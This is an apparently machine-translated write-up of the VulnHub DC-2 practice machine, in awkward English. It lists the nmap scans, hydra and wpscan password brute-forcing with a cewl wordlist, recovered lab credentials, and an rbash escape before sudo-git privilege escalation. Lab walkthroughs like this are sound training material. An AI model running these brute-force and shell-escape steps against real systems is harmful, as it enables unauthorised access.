DC2 of vulnhub

sketch ： Brothers, you can move to https://blog.csdn.net/shuteer_xu/article/details/116141639, Just look at the master's , I just take it as a note
The third one , The host found , Port scanning , fingerprint identification
The host found

nmap -sS 192.168.43.0/24

Full port scanning

nmap -A -p- 192.168.43.130 

Co discovery 7744 by ssh Port is open , Use hydra Blasting , Use
hydra -L /opt/user.txt -P /opt/mima.txt ssh://192.168.43.130:7744 This command makes a burst attempt , No corresponding results found

80 by Apache port ,nmap The display will be redirected to http://dc-2 in , modify /etc/hosts file , add to 192.168.43.130 dc-2

fingerprint identification , Use whatweb Fingerprint identification , Found as wordpress, Use wpscan To test , The scan did not find the corresponding vulnerability that could be exploited , Try enumerating user names ,

Use the browser to access , Found to have flag page , Show that you need to use cewl Get password dictionary , Use cewl dc-2 >pass.txt This command gets the password dictionary

Three user names were found ：admin,jerry,tom, Store the three user names as user.txt, I use wpscan The password corresponding to the blasting account

wpscan --url http://dc-2/ -U user.txt -P pass.txt

Co discovery

 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

Corresponding user name and password

Try to connect ssh jerry Unsuccessful login ,tom Successful landing , Displays the commands that the user can execute

echo  $PATH

echo /home/tom/usr/bin/*

Find out tom Users can only use less,scp,ls,vi Four orders , There are... Under this folder flag3.txt file , Remind us that we need su To jerry Among users ,
But input su jerry Missing display command not found , Read the boss's blog , There is rbash, Equivalent to permission control , Makes it impossible for the user to execute certain commands , Need to bypass rbash

Take orders from the boss

[email protected]‐2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
[email protected]‐2:~$ export PATH=$PATH:/bin/
[email protected]‐2:~$ export PATH=$PATH:/usr/bin

You can bypass rbash Switch users , Switch to jerry Under the user , Next, you need to raise the right
sudo -l View what the current user can use root command

Shows that there is a git have access to sudo perform
lookup git A power order , There are two kinds of links in Shifu's blog git The way to claim rights , I use the first one , Successful claim , The second kind , It is estimated that the ability is insufficient , Can not realize the operation of raising rights
The following is Shifu's blog address ,
https://blog.csdn.net/shuteer_xu/article/details/116141639